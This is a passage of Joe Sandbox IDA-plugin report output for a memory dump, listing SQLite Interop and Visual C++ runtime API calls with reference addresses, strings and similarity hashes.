                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1F38
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.$_memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 3073774149-160653349
                                                                                                                                                                                                                                      • Opcode ID: 343f6a6c0fe0a1c7142f992dd373a11a17f02167e2d9982108bd94eea8a93c49
                                                                                                                                                                                                                                      • Instruction ID: 5249b7d88db9cab55a36624b2c657e6263d5408b595938c173e4c8c3e8181735
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 343f6a6c0fe0a1c7142f992dd373a11a17f02167e2d9982108bd94eea8a93c49
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 334122B16207159BD7108F799C06B87B7A8FF40728F000568FA19DB241FB3DE6268BE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: ,$7$9
                                                                                                                                                                                                                                      • API String ID: 2102423945-1653249994
                                                                                                                                                                                                                                      • Opcode ID: 8a995c2b27bb8b037c44c8e8aec729e33f202ecd00c557c451a97611ca4748bc
                                                                                                                                                                                                                                      • Instruction ID: 24dbfc1bb1d1d41fca288b34f202b535c8caefa32792722bb180d3fa4bf5ec21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a995c2b27bb8b037c44c8e8aec729e33f202ecd00c557c451a97611ca4748bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D31E3B15093919FE314CF29D851B6BB7E8AF85714F04491DFA944B281E778EB08CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BCC1A50: SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,?,00000001,?,?,?), ref: 6BCC1ACD
                                                                                                                                                                                                                                        • Part of subcall function 6BCC1A50: SIa364946505687432.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AE1
                                                                                                                                                                                                                                        • Part of subcall function 6BCC1A50: SI06ad3f4f233fab5b.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AFE
                                                                                                                                                                                                                                      • SIc14fb8a21feb2e94.SQLITE.INTEROP(00000000,SAVEPOINT replace_op,00000000,00000000,00000000), ref: 6BCC249E
                                                                                                                                                                                                                                      • SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,?,00000001,00000000,00000000,?,?,?), ref: 6BCC24D3
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCC24E3
                                                                                                                                                                                                                                      • SIc14fb8a21feb2e94.SQLITE.INTEROP(00000000,RELEASE replace_op,00000000,00000000,00000000), ref: 6BCC251F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8c5d6a3d79dd16ae.Ia364946505687432.Ic14fb8a21feb2e94.$I06ad3f4f233fab5b.
                                                                                                                                                                                                                                      • String ID: RELEASE replace_op$SAVEPOINT replace_op
                                                                                                                                                                                                                                      • API String ID: 3125106539-3590263232
                                                                                                                                                                                                                                      • Opcode ID: 8605b896c14e9e0ded0b42473336ca1455761ef9495b219984d99c6cc58b34a2
                                                                                                                                                                                                                                      • Instruction ID: 6011e57fd98e59ba7d823318e2c86cff19cea2e8ad18a6fd522903c0bd0da1c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8605b896c14e9e0ded0b42473336ca1455761ef9495b219984d99c6cc58b34a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55316FB6A142007BE320DE659C52F7777ACDB94258F009559FD5A87241F738EA1086A2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(%s.%s,?,?), ref: 6BC2F50D
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(%s.%z,?,00000000), ref: 6BC2F528
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: %s.%s$%s.%z$access to %z is prohibited$authorizer malfunction
                                                                                                                                                                                                                                      • API String ID: 778684903-3806136567
                                                                                                                                                                                                                                      • Opcode ID: e95eb56a3701b5748717a98b89efe486bdd9ca226eb475346adee49f2f31888e
                                                                                                                                                                                                                                      • Instruction ID: 4f99690ef6701ac5a056b58591135f8f3c34efbbb31ac7de92ec2c11d287729b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e95eb56a3701b5748717a98b89efe486bdd9ca226eb475346adee49f2f31888e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7218471914609AFD710DF68DC81EABB3A8EB85228F004569FC1887241E779AA548BE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 6BBD2495
                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 6BBD24A1
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 6BBD24AE
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,6BBD240B,00000000,?,?), ref: 6BBD24E5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 6BBD24EF
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 6BBD24F8
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 6BBD2503
                                                                                                                                                                                                                                        • Part of subcall function 6BBD2362: __getptd_noexit.LIBCMT ref: 6BBD2362
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                                                                                      • Opcode ID: 2af64906f234e0f3e4fa68355facf57666f798778fc8a1e41b570397ff4cc456
                                                                                                                                                                                                                                      • Instruction ID: f9b4303428fa5a0b1187addb7dc2c7adbc8fd72fbbe0393dbe9ea537d01389ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2af64906f234e0f3e4fa68355facf57666f798778fc8a1e41b570397ff4cc456
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11C4322047CAAFEB159FB4DC42D8F7BE8EF45778B104029F91586181DB7DD9118BA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(non-deterministic use of %s() in %s,?,a generated column), ref: 6BC3D76B
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,000000FF,000000FF,00000001,000000FF,non-deterministic use of %s() in %s,?,a generated column), ref: 6BC3D78A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                                                      • API String ID: 3537641774-3705377941
                                                                                                                                                                                                                                      • Opcode ID: e08df82169077c04dc4a003d304688bc01d8340d0e9d68e1d7a61eb00f2c0292
                                                                                                                                                                                                                                      • Instruction ID: c1230e31cc05d6effe2592e8161899e9922058634ae5b81dc035febc02f8cce4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08df82169077c04dc4a003d304688bc01d8340d0e9d68e1d7a61eb00f2c0292
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A01F9B12241146BD620CF5CD841E3673D99B46738B500399F478CF2D0FB2AE9518751
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 6BBD21E1
                                                                                                                                                                                                                                        • Part of subcall function 6BBD63A2: GetLastError.KERNEL32(00000001,00000000,6BBD2367,6BBDC537,00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD), ref: 6BBD63A6
                                                                                                                                                                                                                                        • Part of subcall function 6BBD63A2: ___set_flsgetvalue.LIBCMT ref: 6BBD63B4
                                                                                                                                                                                                                                        • Part of subcall function 6BBD63A2: __calloc_crt.LIBCMT ref: 6BBD63C8
                                                                                                                                                                                                                                        • Part of subcall function 6BBD63A2: DecodePointer.KERNEL32(00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD,00000000,00000000,?,6BBD64C6), ref: 6BBD63E2
                                                                                                                                                                                                                                        • Part of subcall function 6BBD63A2: GetCurrentThreadId.KERNEL32 ref: 6BBD63F8
                                                                                                                                                                                                                                        • Part of subcall function 6BBD63A2: SetLastError.KERNEL32(00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD,00000000,00000000,?,6BBD64C6), ref: 6BBD6410
                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 6BBD2203
                                                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 6BBD2221
                                                                                                                                                                                                                                      • _strcpy_s.LIBCMT ref: 6BBD2229
                                                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 6BBD223E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6BBD21EE, 6BBD2211
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                                                                                                                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                                                                                      • API String ID: 3117964792-798102604
                                                                                                                                                                                                                                      • Opcode ID: 19b03157b715da6f4b9a70e4d47611f95fb6b4dc530c007a7f2cc913d2e2cdb9
                                                                                                                                                                                                                                      • Instruction ID: e1058a4be76b514c7c49b68e70d7ee1bc449e9acfca4ffae971285335c1550c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b03157b715da6f4b9a70e4d47611f95fb6b4dc530c007a7f2cc913d2e2cdb9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2F05932A48AD06BD2112A7EDC81C5F73ADDB86B6CB00053EFA059B100E72DDD414360
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA20,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CFA9
                                                                                                                                                                                                                                      • SIdbdaa654d0b26d40.SQLITE.INTEROP(?,6BBFAF80,?), ref: 6BC5CFC8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5CFA2
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5CF93
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5CF9D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.$Idbdaa654d0b26d40.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 1815078321-160653349
                                                                                                                                                                                                                                      • Opcode ID: 21fe0a83cc760104c15c5046c5ad5f2c221722c59eab6407e3c7b56d7468f7b0
                                                                                                                                                                                                                                      • Instruction ID: 200e54857228fe8e869c0e44396ac6a30257553f4a83fd1e2cc73e5af2abab17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21fe0a83cc760104c15c5046c5ad5f2c221722c59eab6407e3c7b56d7468f7b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86F0B47776421426C6006AB97C02FCB775CCBD0679F004076FA0CEE181F718A63601EA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BD114E0,00000008,6BBD63F6,00000000,00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C), ref: 6BBD62FF
                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 6BBD6333
                                                                                                                                                                                                                                        • Part of subcall function 6BBDC1A2: __mtinitlocknum.LIBCMT ref: 6BBDC1B8
                                                                                                                                                                                                                                        • Part of subcall function 6BBDC1A2: __amsg_exit.LIBCMT ref: 6BBDC1C4
                                                                                                                                                                                                                                        • Part of subcall function 6BBDC1A2: EnterCriticalSection.KERNEL32(00000000,00000000,?,6BBD64C6,0000000D,6BD11508,00000008,6BBD65BD,00000000,?,6BBD3311,00000000,6BD11440,00000008,6BBD3376,?), ref: 6BBDC1CC
                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 6BBD6340
                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 6BBD6354
                                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 6BBD6372
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                                                                                      • Opcode ID: f46e30d84cbd58d1656012112b11eacbe9e74475fd10e2cbeb16e91b2448e26e
                                                                                                                                                                                                                                      • Instruction ID: cc1a454aa0c698a262b417398edd31ff293d5fabb06bac85215373efcc241b1a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f46e30d84cbd58d1656012112b11eacbe9e74475fd10e2cbeb16e91b2448e26e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4011B71845B40EBE7209F7AD80674DFBE0AF51328F108A4ED49A966A0CBBCE645CF15
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000070D2,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC55ED9
                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6BC55EE5
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC55EEC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC55ED2
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55EC3
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC55ECD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalDeleteI769271af19a2299d.Iaa0f8e0c251cfd1d.Section
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 1777436853-160653349
                                                                                                                                                                                                                                      • Opcode ID: e2eabdd7726adaabe151314ccc871b9fcb36cb7cf7f8997abd0dbe4c9eb9db99
                                                                                                                                                                                                                                      • Instruction ID: 140568c9f3ec693433d3ce617958850d121213d61fe3f9a6ccbe087af099563e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2eabdd7726adaabe151314ccc871b9fcb36cb7cf7f8997abd0dbe4c9eb9db99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68E08673A6122467D9106AA8BC02DDB775C9B0167DB040062FA0DEE142FA5DEB6442F6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC25A38
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC25A98
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC25B4C
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?), ref: 6BC25C00
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(0000000B,?,?,?), ref: 6BC25C5E
                                                                                                                                                                                                                                        • Part of subcall function 6BC0CC40: SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,6BC1D2C9,?,?,?,?,?,?), ref: 6BC0CC76
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?), ref: 6BC25CD7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
